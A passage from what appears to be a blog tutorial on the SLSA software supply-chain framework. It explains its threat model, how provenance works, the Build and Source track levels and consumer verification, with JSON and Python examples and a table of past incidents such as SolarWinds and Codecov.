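# HMAC stands in for code signing here; the key is illustrative.
signing_key = b"solarwinds-release-key"

def sign(artifact: bytes) -> bytes:
    return hmac.new(signing_key, artifact, hashlib.sha256).digest()

def verify(artifact: bytes, signature: bytes) -> bool:
    return hmac.compare_digest(sign(artifact), signature)

clean_build = b"binary built from the reviewed source"
backdoored  = b"binary built from SUNSPOT-swapped source"

# The pipeline signs whatever came out of the build -- including a
# backdoored artifact, because the swap happened *before* signing.
sig = sign(backdoored)
print(verify(backdoored, sig))  # True: the signature is mathematically perfect
# Nothing in the signature links the binary back to a source commit;
# that missing link is exactly what Provenance records.
```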

&lt;p&gt;This is the massive blind spot SLSA aims to fix.&lt;/p&gt;

&lt;h3&gt;
  
  
  Terminology Checklist
&lt;/h3&gt;

&lt;p&gt;Let's nail down the jargon before we proceed.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Provenance&lt;/strong&gt;: Verifiable metadata describing "where," "how," and "from what" a software artifact was created. The core concept of SLSA.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Attestation&lt;/strong&gt;: An authenticated statement about a software artifact. Provenance is a type of Attestation.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;in-toto&lt;/strong&gt;: A framework to secure the software supply chain. SLSA uses its Attestation format.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;DSSE (Dead Simple Signing Envelope)&lt;/strong&gt;: The envelope format used to sign Attestations. It wraps a JSON payload with a digital signature.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Build Platform&lt;/strong&gt;: A hosted service that executes the build (e.g., GitHub Actions, Google Cloud Build).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Control Plane&lt;/strong&gt;: The management component inside the build platform that controls execution and generates Provenance. It is strictly isolated from user-defined build steps (the data plane).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tenant&lt;/strong&gt;: The user or project using the build platform. In GitHub Actions, each repository's workflow acts as a tenant.&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  The Big Picture of SLSA
&lt;/h2&gt;

&lt;p&gt;SLSA is a framework that defines "what must be guaranteed at each stage of the supply chain" across different levels. It aligns nicely with NIST's Secure Software Development Framework (SSDF).&lt;/p&gt;

&lt;p&gt;The key here is that SLSA isn't a monolithic checklist. It's broken down into &lt;strong&gt;Tracks&lt;/strong&gt; tackling different aspects of the supply chain, with progressive &lt;strong&gt;Levels&lt;/strong&gt; inside each track.&lt;/p&gt;

&lt;p&gt;Current tracks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Build Track&lt;/strong&gt; (since v1.0): Protects build integrity. The most mature track.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Source Track&lt;/strong&gt; (added in v1.2): Protects source code integrity.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Build Environment Track&lt;/strong&gt; (drafting): Protects the integrity of the build execution environment.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dependency Track&lt;/strong&gt; (drafting): Manages risks from dependencies.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;We'll focus heavily on the fully released Build and Source Tracks.&lt;/p&gt;




&lt;h2&gt;
  
  
  Threat Model: What Are We Protecting Against?
&lt;/h2&gt;

&lt;p&gt;To understand SLSA's design, you must understand the threat model. SLSA categorizes supply chain threats into 9 buckets, from &lt;strong&gt;(A)&lt;/strong&gt; to &lt;strong&gt;(I)&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn8rk4op0ym7ctg07ke99.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fn8rk4op0ym7ctg07ke99.png" alt="Threat Model" width="800" height="70"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;SLSA doesn't fix everything. &lt;strong&gt;It directly mitigates threats (B) through (G).&lt;/strong&gt; A malicious producer (A), typosquatting (H), and bad usage (I) are explicitly out of scope.&lt;/p&gt;

&lt;p&gt;If we map real-world incidents to this threat model, it becomes terrifyingly clear this isn't just theoretical:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Threat&lt;/th&gt;
&lt;th&gt;Incident&lt;/th&gt;
&lt;th&gt;What Happened&lt;/th&gt;
&lt;th&gt;SLSA Mitigation&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;(B)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SushiSwap (2021)&lt;/td&gt;
&lt;td&gt;A contractor with repo access pushed a commit stealing crypto.&lt;/td&gt;
&lt;td&gt;Source Track L4: Two-person review&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;(C)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;PHP (2021)&lt;/td&gt;
&lt;td&gt;Attackers compromised PHP's self-hosted git server and injected a backdoor commit.&lt;/td&gt;
&lt;td&gt;Source Track: Robust SCM requirements&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;(D)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;The Great Suspender (2020)&lt;/td&gt;
&lt;td&gt;A new maintainer published an extension built from an unverified, different source.&lt;/td&gt;
&lt;td&gt;Build Track: Detect source mismatch via Provenance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;(E)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;SolarWinds (2020)&lt;/td&gt;
&lt;td&gt;SUNSPOT swapped source files during the build and signed it.&lt;/td&gt;
&lt;td&gt;Build Track L3: Isolated builds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;(F)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Codecov (2021)&lt;/td&gt;
&lt;td&gt;Attackers directly uploaded a malicious script to GCS using leaked credentials.&lt;/td&gt;
&lt;td&gt;Build Track: Detect missing build via Provenance&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;(G)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Package Mirror Attack (2008)&lt;/td&gt;
&lt;td&gt;Researchers proved they could serve arbitrary packages by operating a mirror.&lt;/td&gt;
&lt;td&gt;Build Track: Verify origin via Provenance&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Provenance: The Core of SLSA
&lt;/h2&gt;

&lt;p&gt;Before looking at the Build Track levels, you must understand SLSA's lifeblood: &lt;strong&gt;Provenance&lt;/strong&gt;. Every level in the Build Track revolves around this concept.&lt;/p&gt;

&lt;p&gt;Provenance is metadata detailing "where," "how," and "from what" an artifact was generated. SLSA structures this using the &lt;a href="https://github.com/in-toto/attestation" rel="noopener noreferrer"&gt;in-toto attestation&lt;/a&gt; format.&lt;/p&gt;

&lt;p&gt;Let's look at what GitHub Actions spits out:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"_type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://in-toto.io/Statement/v1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"subject"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"my-app-v1.2.3.tar.gz"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"sha256"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"a1b2c3d4..."&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}],&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"predicateType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://slsa.dev/provenance/v1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"predicate"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"buildDefinition"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"buildType"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"externalParameters"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"workflow"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"ref"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"refs/tags/v1.2.3"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"repository"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/example/my-app"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"path"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;".github/workflows/release.yml"&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"resolvedDependencies"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"uri"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"git+https://github.com/example/my-app@refs/tags/v1.2.3"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"digest"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"gitCommit"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"abc123..."&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="nl"&gt;"runDetails"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"builder"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="nl"&gt;"id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"https://github.com/slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@refs/tags/v2.1.0"&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This structure holds 4 critical elements:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsdaexp9mopvqvapydja8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsdaexp9mopvqvapydja8.png" alt="Provenance Structure" width="686" height="955"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;externalParameters&lt;/strong&gt; is absolutely crucial. This is the "external input" to the build, and SLSA considers it untrusted. The consumer must check this field to answer, "Was this built from the correct repo and tag?" The Great Suspender incident happened entirely because this "built from what" verification didn't exist.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;builder.id&lt;/strong&gt; is equally important. When consumers see this ID, they assume "this build platform meets SLSA Build L3." In other words, &lt;strong&gt;trusting the build platform is a hard prerequisite.&lt;/strong&gt; This reflects SLSA's core principle: "Trust the platform, verify the artifact."&lt;/p&gt;
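&lt;p&gt;Those two checks can be sketched as code. This is an illustration only: the field accesses mirror the JSON above, the trusted-builder set is an assumption, and a real deployment would run &lt;code&gt;slsa-verifier&lt;/code&gt; rather than hand-rolled checks.&lt;/p&gt;

```python
import hashlib

# Illustrative trusted-builder allow-list (one entry, from the example above).
TRUSTED_BUILDERS = {
    "https://github.com/slsa-framework/slsa-github-generator/.github/workflows/generator_generic_slsa3.yml@refs/tags/v2.1.0",
}

def check_provenance(statement, artifact, expected_repo):
    # 1. The subject digest must match the artifact actually in hand.
    digest = hashlib.sha256(artifact).hexdigest()
    if not any(s["digest"].get("sha256") == digest for s in statement["subject"]):
        return False
    # 2. builder.id must be a platform we trust to meet Build L3.
    pred = statement["predicate"]
    if pred["runDetails"]["builder"]["id"] not in TRUSTED_BUILDERS:
        return False
    # 3. externalParameters must name the repository we expected.
    workflow = pred["buildDefinition"]["externalParameters"]["workflow"]
    return workflow["repository"] == expected_repo

artifact = b"release tarball bytes"
statement = {
    "subject": [{"name": "my-app-v1.2.3.tar.gz",
                 "digest": {"sha256": hashlib.sha256(artifact).hexdigest()}}],
    "predicate": {
        "buildDefinition": {"externalParameters": {"workflow": {
            "repository": "https://github.com/example/my-app"}}},
        "runDetails": {"builder": {"id": next(iter(TRUSTED_BUILDERS))}},
    },
}
print(check_provenance(statement, artifact, "https://github.com/example/my-app"))  # True
print(check_provenance(statement, artifact, "https://github.com/evil/fork"))       # False
```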




&lt;h2&gt;
  
  
  Build Track: Guaranteeing the Build
&lt;/h2&gt;

&lt;p&gt;With Provenance understood, let's dissect the Build Track. Each level is defined by "how hard it is to forge the Provenance."&lt;/p&gt;

&lt;h3&gt;
  
  
  Build L1: Provenance Exists
&lt;/h3&gt;

&lt;p&gt;The bare minimum. The build process spits out Provenance.&lt;/p&gt;

&lt;p&gt;L1 Requirements:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Follows a consistent build process (e.g., scripted).&lt;/li&gt;
&lt;li&gt;Provenance is generated (contains builder.id, buildType, externalParameters, subject).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Provenance does NOT need to be signed.&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;You might ask, "If it's unsigned, what's the point?" It actually has massive value. Just having Provenance makes incident response vastly easier. You can instantly answer, "Which commit did this binary come from?" It also prevents release accidents, like building from the wrong branch.&lt;/p&gt;

&lt;p&gt;However, in L1, forging Provenance is trivial. An attacker just edits the file.&lt;/p&gt;

&lt;h3&gt;
  
  
  Build L2: Signed Provenance
&lt;/h3&gt;

&lt;p&gt;Two game-changing differences from L1:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;The build runs on a hosted platform&lt;/strong&gt; (not a developer's laptop).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Provenance is signed by the build platform.&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Furpiej7wsv6f817vcs1z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Furpiej7wsv6f817vcs1z.png" alt="Signed Provenance" width="800" height="633"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Crucially, the signature is applied by the &lt;strong&gt;platform's control plane&lt;/strong&gt;, not the tenant (user). If the tenant signed it, leaked credentials would allow attackers to mint fake Provenance. Because the control plane signs it, forging Provenance requires compromising the build platform itself.&lt;/p&gt;

&lt;p&gt;L2 completely neuters Codecov-style attacks. An artifact uploaded directly without triggering a build simply won't have a platform-signed Provenance. When the consumer verifies it, the attack fails.&lt;/p&gt;

&lt;p&gt;But L2 has a flaw: &lt;strong&gt;It doesn't require isolation between tenants on the same platform.&lt;/strong&gt; A malicious tenant could theoretically interfere with another tenant's build or access signing keys.&lt;/p&gt;

&lt;h3&gt;
  
  
  Build L3: Hardened Builds
&lt;/h3&gt;

&lt;p&gt;L3 is engineered to defeat SolarWinds-style attacks. It adds 3 requirements:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Isolated builds&lt;/strong&gt;: Every build runs in a strictly isolated environment.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Invisible signing keys&lt;/strong&gt;: User-defined build steps have zero access to the signing keys.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Complete externalParameters&lt;/strong&gt;: Every single external input is logged in the Provenance.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzf204mo290c1lf1kcqp7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzf204mo290c1lf1kcqp7.png" alt="Build L3" width="800" height="223"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Think back to SUNSPOT. It hijacked the build environment to swap source files. L3 makes this agonizingly difficult:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Because builds are isolated, injecting malware from the outside requires breaching the platform itself.&lt;/li&gt;
&lt;li&gt;Even if attackers inject malware into the build step, they can't access the signing key, meaning they can't forge a validly signed Provenance.&lt;/li&gt;
&lt;li&gt;Because the Control Plane generates the Provenance, the tenant's code cannot manipulate what gets written.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;It makes attacks &lt;em&gt;difficult&lt;/em&gt;, not &lt;em&gt;impossible&lt;/em&gt;. If the control plane has a vulnerability, L3 falls. But the bar is raised exponentially.&lt;/p&gt;

&lt;h3&gt;
  
  
  Build Track Level Comparison
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Requirement&lt;/th&gt;
&lt;th&gt;L1&lt;/th&gt;
&lt;th&gt;L2&lt;/th&gt;
&lt;th&gt;L3&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Consistent build process&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Provenance generation&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hosted build platform&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Signed Provenance&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Build isolation&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Invisible signing keys&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Complete externalParameters&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Difficulty of forging Provenance&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Trivial&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Requires platform compromise&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Requires exploiting vulnerabilities&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Source Track: Defending the Source Code
&lt;/h2&gt;

&lt;p&gt;While the Build Track protects the "integrity of the build process," the Source Track protects the "integrity of the source code handed to the build." It's a relatively new addition finalized in v1.2.&lt;/p&gt;

&lt;p&gt;The problem the Source Track solves is dead simple: If you generate flawless Provenance in the Build Track but the source code was already poisoned, you've accomplished nothing. In the PHP incident, attackers hacked the git server and injected a backdoor commit. The Build Track alone cannot tell if that commit is legitimate.&lt;/p&gt;

&lt;h3&gt;
  
  
  The 4 Levels of the Source Track
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Source L1: Version Controlled.&lt;/strong&gt; Source code is stored in a VCS like Git. It's vastly superior to emailing ZIP files, but offers almost zero guarantees.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source L2: History and Provenance.&lt;/strong&gt; Branch history must be continuous and immutable. The Source Code Management (SCM) system must issue a Source Provenance Attestation for every revision. Think of this as Build Provenance for code: it records "when, by whom, and how the change was made." Force pushes and history rewriting are banned.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source L3: Technical Controls.&lt;/strong&gt; The SCM &lt;strong&gt;enforces policies at the system level&lt;/strong&gt;. Rules like "no direct pushes to main" aren't just polite requests in a README; they are technically impossible to violate. Verifiers can mathematically prove "this revision was created following the correct procedures."&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Source L4: Two-Person Review.&lt;/strong&gt; All changes to protected branches require review by two trusted individuals. This entirely blocks SushiSwap-style attacks where an insider pushes malicious code unilaterally. If one developer's credentials are stolen, the second reviewer acts as a hard wall.&lt;/p&gt;




&lt;h2&gt;
  
  
  Verification Flow: What Must Consumers Check?
&lt;/h2&gt;

&lt;p&gt;Generating and signing Provenance is useless if nobody checks it. SLSA dictates a strict 3-step verification process for consumers.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjgmivr8m7d23jvucm698.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjgmivr8m7d23jvucm698.png" alt="Verification Flow" width="643" height="1079"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1&lt;/strong&gt; asks, "Has this Provenance been tampered with?" You verify the signature and ensure the subject digest inside the Provenance perfectly matches the actual artifact in your hands. This proves it wasn't swapped for a fake binary.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 2&lt;/strong&gt; asks, "Was it built the way we expected?" This is where &lt;strong&gt;externalParameters verification&lt;/strong&gt; happens. Is the builder.id trusted? Is the source repo legitimate? Is the workflow what we expected? SLSA demands that you &lt;strong&gt;reject the artifact if there are unknown fields&lt;/strong&gt;. This prevents verifiers from accidentally ignoring unexpected parameters.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3&lt;/strong&gt; is recursive dependency verification. But let's be real: traversing the Provenance of every single dependency is an operational nightmare. This is exactly what &lt;strong&gt;VSA (Verification Summary Attestation)&lt;/strong&gt; solves.&lt;/p&gt;
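&lt;p&gt;As a rough illustration, Steps 1 and 2 can be sketched in a few lines of Python. This assumes the Provenance envelope signature has already been verified and the in-toto Statement parsed into a dict; the field paths follow the SLSA v1 provenance layout, and &lt;code&gt;trusted_builders&lt;/code&gt; / &lt;code&gt;expected&lt;/code&gt; are hypothetical policy inputs, not part of any real tool.&lt;/p&gt;

```python
import hashlib

def verify_provenance(artifact_bytes, statement, trusted_builders, expected):
    # Step 1: the subject digest inside the Provenance must match
    # the sha256 of the artifact actually in our hands.
    digest = hashlib.sha256(artifact_bytes).hexdigest()
    if not any(s["digest"].get("sha256") == digest for s in statement["subject"]):
        return False, "subject digest does not match artifact"

    # Step 2: was it built the way we expected?
    pred = statement["predicate"]
    builder_id = pred["runDetails"]["builder"]["id"]
    if builder_id not in trusted_builders:
        return False, "untrusted builder: " + builder_id

    params = pred["buildDefinition"]["externalParameters"]
    # SLSA: reject on unknown fields instead of silently ignoring them.
    unknown = set(params) - set(expected)
    if unknown:
        return False, "unknown externalParameters: " + ", ".join(sorted(unknown))
    for key, want in expected.items():
        if params.get(key) != want:
            return False, "unexpected value for " + key
    return True, "ok"
```

&lt;p&gt;Note the strictness of the unknown-field check: a parameter the policy has never heard of is grounds for rejection, not a shrug.&lt;/p&gt;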

&lt;h3&gt;
  
  
  VSA: Making Dependency Verification Realistic
&lt;/h3&gt;

&lt;p&gt;A VSA is a higher-level attestation stating, "A trusted verifier has already validated the Provenance for this artifact."&lt;/p&gt;

